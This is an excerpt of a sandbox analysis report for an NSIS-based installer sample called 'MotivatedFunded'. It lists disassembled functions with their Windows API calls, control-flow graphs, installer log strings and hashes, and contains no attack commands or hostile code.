                                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID: @rD
                                                                    • API String ID: 3282139019-3814967855
                                                                    • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                    • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                    Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                    APIs
                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                    Strings
                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                    • Call: %d, xrefs: 0040165A
                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                    • Jump: %d, xrefs: 00401602
                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                    • detailprint: %s, xrefs: 00401679
                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                    • Sleep(%d), xrefs: 0040169D
                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                    • BringToFront, xrefs: 004016BD
                                                                    • Rename: %s, xrefs: 004018F8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                    • API String ID: 2872004960-3619442763
                                                                    • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                    • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                    Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                    APIs
                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                    • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                    • API String ID: 608394941-1650083594
                                                                    • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                    • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                    Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • lstrcatW.KERNEL32(00000000,00000000,CharAssociationsLeavingIllustrated,004CB0B0,00000000,00000000), ref: 00401A76
                                                                    • CompareFileTime.KERNEL32(-00000014,?,CharAssociationsLeavingIllustrated,CharAssociationsLeavingIllustrated,00000000,00000000,CharAssociationsLeavingIllustrated,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                    • String ID: CharAssociationsLeavingIllustrated$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                    • API String ID: 4286501637-621422371
                                                                    • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                    • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                    Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                    Strings
                                                                    • Null, xrefs: 0040367E
                                                                    • soft, xrefs: 00403675
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                    • Error launching installer, xrefs: 004035D7
                                                                    • Inst, xrefs: 0040366C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 4283519449-527102705
                                                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                    Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                    • wsprintfW.USER32 ref: 004034A4
                                                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2178954017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2178939309.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178970891.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2178990801.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2179101979.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_MotivatedFunded.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                    • String ID: ... %d%%$P1B$X1C$X1C
                                                                    • API String ID: 651206458-1535804072
                                                                    • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                    • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                    Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
